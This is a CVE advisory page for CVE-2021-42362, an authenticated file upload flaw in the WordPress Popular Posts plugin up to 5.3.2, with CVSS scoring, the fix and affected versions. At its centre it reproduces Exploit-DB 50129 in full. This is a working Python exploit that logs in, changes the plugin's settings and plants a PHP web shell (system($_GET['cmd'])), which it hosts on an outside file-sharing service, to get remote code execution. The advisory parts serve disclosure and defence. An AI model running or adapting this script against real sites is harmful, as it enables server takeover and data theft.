CVE-2021-42362 : Detail

CVE-2021-42362

8.8
/
High
File Inclusion
A04-Insecure Design
84.5%V4
Network
2021-11-17
17h44 +00:00
2024-09-16
18h45 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

WordPress Popular Posts <= 5.3.2 Authenticated Arbitrary File Upload

The WordPress Popular Posts WordPress plugin is vulnerable to arbitrary file uploads due to insufficient input file type validation found in the ~/src/Image.php file which makes it possible for attackers with contributor level access and above to upload malicious files that can be used to obtain remote code execution, in versions up to and including 5.3.2.

CVE Solutions

Update to version 5.3.3 or newer.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-434 Unrestricted Upload of File with Dangerous Type
The product allows the upload or transfer of dangerous file types that are automatically processed within its environment.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Network

The vulnerable component is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers).

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

Low

The attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

V2 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 50129

Publication date : 2021-07-14 22h00 +00:00
Author : Simone Cristofaro
EDB Verified : No

# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated) # Date: 15/07/2021 # Exploit Author: Simone Cristofaro # Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/ # Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip # Version: 5.3.2 or below # Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27 # CVE: CVE-2021-42362 # Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/ # Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is # enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above. # This script will login with the provided credentials, create a new post and add a custom field with the link to a # web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to # provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is # set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;) ''' Banner: ''' banner = """ * Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated) * @Heisenberg """ print(banner) ''' Import required modules: ''' import requests import argparse import json import re ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)') my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip") my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port") my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',metavar='PATH', type=str, required=True, dest="wp_path") my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username") my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password") args = my_parser.parse_args() target_ip = args.target_ip target_port = args.target_port wp_path = args.wp_path username = args.username password = args.password ''' # Hard coded parameters (if you don't like command line execution) target_ip = "localhost" target_port = "80" wp_path = "/wordpress/" username = "heisenberg" password = "heisenberg" ''' shell_name = 'exploit.gif.php' payload = 'GIF <html> <body> <form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET[\'cmd\'])) { system($_GET[\'cmd\']); } ?> </pre> </body> </html>' print('') print('[*] Starting Exploit:') ''' Upload file ''' file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)}) resp = json.loads(file_json.text) if resp['status']: urlshort = resp['data']['file']['url']['full'] else: print(f'[-] Error:'+ resp['error']['message']) exit() file_uploaded_site = requests.get(urlshort).text PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Monies Browser 1.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print(f'[+] Authentication successfull as user [{username}] !') else: print('[-] Authentication failed ! Check username and password') exit() ''' Verify that the requirements are installed ''' settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug' settings_page = session.get(settings_page_url).text search_string = ' gd' if settings_page.find(search_string) == -1 : print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.') exit() ''' Get the wpp-admin-token ''' settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools' settings_page = session.get(settings_page_url).text search_string = '<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="' search_string_end = '" />' settings_page = settings_page[settings_page.find(search_string):] wpp_admin_token = settings_page[72: settings_page.find(search_string_end)] if wpp_admin_token: print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].') else: print('[-] Error while gathering wpp-admin-token !') exit() ''' Apply changes to the Popular Posts plugin ''' body = { 'upload_thumb_src': '', 'thumb_source': 'custom_field', 'thumb_lazy_load': 1, 'thumb_field': 'wpp_thumbnail', 'thumb_field_resize': 1, 'section': 'thumb', 'wpp-admin-token': wpp_admin_token } applied_changes = session.post(settings_page_url, headers=header, data=body).text if applied_changes.find('<div class="notice notice-success is-dismissible"><p><strong>Settings saved.'): print(f'[+] Settings applied successfully to the Popular Posts plugin. ') else: print('[-] Error while applying settings o the Popular Posts plugin!') exit() ''' Empty image cache ''' body = { 'action': 'wpp_clear_thumbnail', 'wpp-admin-token': wpp_admin_token } applied_changes = session.post(settings_page_url, headers=header, data=body).text print(f'[+] Images cache cleared. ') ''' Get the new post ID and Nonce ''' new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php' new_post_page = session.get(new_post_url).text search_string = 'name="_ajax_nonce-add-meta" value="' search_string_end = '" />' new_post_page = new_post_page[new_post_page.find(search_string)+35:] ajax_nonce = new_post_page[:new_post_page.find(search_string_end)] search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "' search_string_end = '" );' new_post_page = new_post_page[new_post_page.find(search_string)+66:] wp_nonce = new_post_page[:new_post_page.find(search_string_end)] search_string = '},"post":{"id":' search_string_end = ',' new_post_page = new_post_page[new_post_page.find(search_string)+15:] post_ID = new_post_page[:new_post_page.find(search_string_end)] if post_ID and wp_nonce and ajax_nonce: print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].') else: if not post_ID: print('[-] Error while gathering post_ID !') elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !') elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !') exit() ''' Publish a new post ''' new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user' data = {"id":post_ID,"title":"I'm the one who knocks","content":"<!-- wp:paragraph -->\n<p>upgrade your plugins</p>\n<!-- /wp:paragraph -->","status":"publish"} header['X-WP-Nonce'] = wp_nonce header['Content-Type'] = 'application/json' header['X-HTTP-Method-Override'] = 'PUT' new_post_page = session.post(new_post_url, headers=header, json=data).text if new_post_page.find('"status":"publish"'): print(f'[+] New post named [I\'m the one who knocks] published correctly!') else: print('[-] Error while publishing the new post !') exit() ''' Add the Custom Filed ''' new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php' header.pop('X-WP-Nonce') header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8' header.pop('X-HTTP-Method-Override') header['Accept']='*/*' header['X-Requested-With'] = 'XMLHttpRequest' body = { '_ajax_nonce': 0, 'action': 'add-meta', 'metakeyselect': 'wpp_thumbnail', 'metakeyinput': "", 'metavalue' : PHP_URL, '_ajax_nonce-add-meta': ajax_nonce, 'post_id' : post_ID } new_post_page = session.post(new_post_url, headers=header, data=body).text if new_post_page.find("<tr id='meta-") > 0: print(f'[+] Added a new Custom Field with the uploaded web shell.') else: print('[-] Error while adding the custom field !') print(new_post_page) exit() ''' Give it some views to pop it up in the recent posts ''' print(f'[+] Giving the new post some views (10) [ ', end="") new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php?page_id=' + post_ID redirect_url = session.get(new_post_url).url new_post_plugin_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wordpress-popular-posts/v1/popular-posts' data = { '_wpnonce': wp_nonce, 'wpp_id': post_ID, 'sampling': 0, 'sampling_rate': 100 } for progress in range(10): session.get(redirect_url) res = session.post(new_post_plugin_url, headers=header, data=data) print ('=', end='') print(' ] '+json.loads(res.text)['results']) print('[+] Exploit done !') print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name) print('')

Products Mentioned

Configuraton 0

Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version To (including) 5.3.2

  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version - (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.3.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.3.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.4 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.4.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.4.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.4.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.4.4 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.4.5 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.4.6 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.5.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 1.5.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.0.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.0.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.0.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.0.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.1.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.1.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.1.4 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.1.5 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.1.6 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.1.7 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.2.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.2.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.4 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.5 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.6 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 2.3.7 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.0.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.0.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.0.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.0.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.1.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.1.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.2.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.2.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.2.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.2.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.2.4 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.3.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.3.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.3.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.3.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 3.3.4 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.3 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.5 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.6 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.8 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.9 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.10 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.11 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.12 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.0.13 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.1.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.1.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.1.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.2.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.2.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 4.2.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 5.0.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 5.0.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 5.0.2 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 5.1.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 5.3.0 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 5.3.1 (Open CPE detail)
  • Wordpress_popular_posts_project>>Wordpress_popular_posts >> Version 5.3.2 (Open CPE detail)

References